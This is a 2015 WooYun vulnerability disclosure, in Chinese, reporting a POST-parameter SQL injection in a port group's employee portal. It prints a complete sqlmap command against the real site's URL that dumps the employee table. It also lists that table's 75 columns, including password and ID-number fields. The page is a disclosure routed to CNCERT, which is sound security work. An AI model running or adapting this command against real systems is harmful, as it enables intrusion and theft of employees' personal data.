港口集团员工门户POST注入漏洞，可导致泄露大量数据

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095917

漏洞标题：港口集团员工门户POST注入漏洞，可导致泄露大量数据

漏洞作者： HackStar

提交时间：2015-02-06 16:40

修复时间：2015-03-23 16:42

公开时间：2015-03-23 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-06：细节已通知厂商并且等待厂商处理中
2015-02-11：厂商已经确认，细节仅向厂商公开
2015-02-21：细节向核心白帽子及相关领域专家公开
2015-03-03：细节向普通白帽子公开
2015-03-13：细节向实习白帽子公开
2015-03-23：细节向公众公开

简要描述：

港口集团员工门户SQL注入漏洞，可导致泄露大量数据（包括全公司数万员工会员信息，其他各类总数据达百万级）
连云港港口集团通信信息工程公司是隶属于港口集团的全民所有制企业，具有独立法人资格，对外实行独立核算。
公司固定资产3000万元，流动资产360万元，年总产值1000万元。公司拥有国家贰级通信信息业务施工资质。拥有多年网络维护、线缆工程、软件开发、软件推广应用所积累的雄厚的业务经验。

详细说明：

SQLMAP注入连接及数据：

http://www.mylygport.com/qiehuan_ser.aspx

sqlmap -u "http://www.mylygport.com/qiehuan_ser.aspx" --data="__VIEWSTATE=%2FwEPDwUJNTM1MzgwMTMxD2QWAgIBD2QWAgIFDzwrAAsBAA8WCB4LXyFJdGVtQ291bnQCAR4IRGF0YUtleXMWASgpW1N5c3RlbS5EZWNpbWFsLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGMjAzOTAxHglQYWdlQ291bnQCAR4VXyFEYXRhU291cmNlSXRlbUNvdW50AgFkFgJmD2QWAgIBD2QWBmYPZBYEZg8VAQYyMDM5MDFkAgEPDxYCHgRUZXh0BQh0el9hZG1pbmRkAgEPZBYCAgEPDxYCHwQFFeaKlei1hOeuoeeQhueuoeeQhuWRmGRkAgIPZBYCAgEPDxYCHwQFLei%2FnuS6kea4r%2Ba4r%2BWPo%2BmbhuWboumAmuS%2FoeS%2FoeaBr%2BW3peeoi%2BWFrOWPuGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJbWFnZUJ1dHRvbjF2be7BNnD5nNOlR7Btl3IXw8OrhQ%3D%3D&__EVENTVALIDATION=%2FwEWAwKZxfLdDQLootVXAtLCmdMIxDejFeR2xnIYve0YDcAHoMVcLtg%3D&textfield=admin&ImageButton1.x=26&ImageButton1.y=20" -D NBW -T USER_INFO --dump

漏洞证明：

百万级的数据：

应该是员工表，很详细：

Database: NBW
Table: USER_INFO
[75 columns]
+-------------------+-----------+
| Column            | Type      |
+-------------------+-----------+
| ADDRESS           | VARCHAR2  |
| ADMIN_COMP        | NUMBER    |
| ADMIN_GONGHUI     | NUMBER    |
| ADMIN_GROUP       | NUMBER    |
| APPID             | NUMBER    |
| ARTICLES          | NUMBER    |
| BAD               | NUMBER    |
| BICOMPANYID       | VARCHAR2  |
| BUMEN_RIGHT       | VARCHAR2  |
| BUMENID           | VARCHAR2  |
| CG                | NUMBER    |
| CG_COMPANY        | VARCHAR2  |
| CODE_COMPANY      | VARCHAR2  |
| CODE_DEPARTMENT   | VARCHAR2  |
| COMPANYID         | VARCHAR2  |
| COOLNAME          | VARCHAR2  |
| CSRQ              | DATE      |
| DUTY              | VARCHAR2  |
| DY_QX             | NUMBER    |
| EMAIL             | VARCHAR2  |
| GBK               | NUMBER    |
| GH_ARTICLES       | NUMBER    |
| GH_FK             | NUMBER    |
| GH_HASMAIL        | NUMBER    |
| GH_SCORE          | NUMBER    |
| GH_TP             | NUMBER    |
| GH_UP_ARTICLES    | NUMBER    |
| GH_UP_IMGNEWS     | NUMBER    |
| GHXT_GROUP        | NVARCHAR2 |
| GONGHAO           | VARCHAR2  |
| GONGHUI_GROUP     | NUMBER    |
| HEAD_PIC          | VARCHAR2  |
| HKV_STATE         | VARCHAR2  |
| HOBBY             | VARCHAR2  |
| HOMEPAGE          | VARCHAR2  |
| ID                | NUMBER    |
| IP_LOGIN          | VARCHAR2  |
| IP_REG            | VARCHAR2  |
| ISADMIN           | VARCHAR2  |
| ISM               | NUMBER    |
| ISOA              | NUMBER    |
| ISOPEN            | NUMBER    |
| ISPLY             | NUMBER    |
| ISYQ              | NUMBER    |
| KDBUMEN           | VARCHAR2  |
| KDCOMPANY         | VARCHAR2  |
| LOADNAME          | VARCHAR2  |
| MARK_DOG          | VARCHAR2  |
| MOBPWD            | NUMBER    |
| NBW_GROUP         | NUMBER    |
| ONLYNBW           | NUMBER    |
| PASSWORD          | VARCHAR2  |
| PEMAIL            | VARCHAR2  |
| PHONE1            | VARCHAR2  |
| PORTVIDEO_CHANNEL | NUMBER    |
| PORTVIDEO_GROUP   | NUMBER    |
| POST              | VARCHAR2  |
| PWD               | VARCHAR2  |
| REG_DATE          | DATE      |
| REG_USER          | NUMBER    |
| SCORE             | NUMBER    |
| SEC_PWD           | VARCHAR2  |
| SECOND_BUMEN      | VARCHAR2  |
| SEX               | VARCHAR2  |
| SF                | NUMBER    |
| SFZH              | VARCHAR2  |
| TEL               | VARCHAR2  |
| TEL1              | VARCHAR2  |
| TEL2              | VARCHAR2  |
| TRUENAME          | VARCHAR2  |
| USER_NUM          | NUMBER    |
| USERNAME          | VARCHAR2  |
| VISIT             | VARCHAR2  |
| WORKNO_EAS        | VARCHAR2  |
| XL                | VARCHAR2  |
+-------------------+-----------+

修复方案：

参数进行安全性验证

版权声明：转载请注明来源 HackStar@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-02-11 14:06

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给江苏分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095917

漏洞标题：港口集团员工门户POST注入漏洞，可导致泄露大量数据

相关厂商：连云港港口集团通信信息工程公司

漏洞作者： HackStar

提交时间：2015-02-06 16:40

修复时间：2015-03-23 16:42

公开时间：2015-03-23 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackStar@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095917

漏洞标题：港口集团员工门户POST注入漏洞，可导致泄露大量数据

相关厂商：连云港港口集团通信信息工程公司

漏洞作者： HackStar

提交时间：2015-02-06 16:40

修复时间：2015-03-23 16:42

公开时间：2015-03-23 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095917"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackStar@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：